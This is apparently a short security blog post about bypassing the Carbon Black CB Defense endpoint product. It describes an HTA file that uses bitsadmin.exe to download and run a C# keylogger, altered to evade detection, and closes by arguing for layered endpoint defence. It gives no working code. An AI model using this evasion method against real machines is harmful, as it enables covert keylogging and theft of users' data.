Carbon Black, bypassed and C# Keylogger Deployed Successfully.

What is more exciting than able to bypass one of the most powerful and famous NextGenAV such as Carbon Black CB Defense in Lockdown Mode and Powershell DISABLED!

CB Defense does include some kind of "system hardening" deployed from the cloud to their agent and to the system.

My first initial successful test was with the "Powershell" enabled in that system. Later, before I shot the video, the policy was set to block "powershell" command but that didn't stop me from finding other windows built-in command to download and deploy the keylogger.

Again, it was HTA that made this attack possible. This time, it was not generated from any payload generator. No Venom, No Empire, No FatRat, No Veil...it was a pure and clean non-onfubscated command of bitsadmin.exe (not powershell) to download and execute (onliner) the C# keylogger (codes and MD5 changed) to evade detection.

After the SentinelOne and CB Defense bypass demo video I made, in the end, I have to admit that Signature Based protection and Application Whitelisting are still required apart from the most advanced and powerful behavioral detections-protections and visibility and response.

Companies need to look at Layered Defense for endpoints. Not just one advanced layered behavioral protection with visibility and response.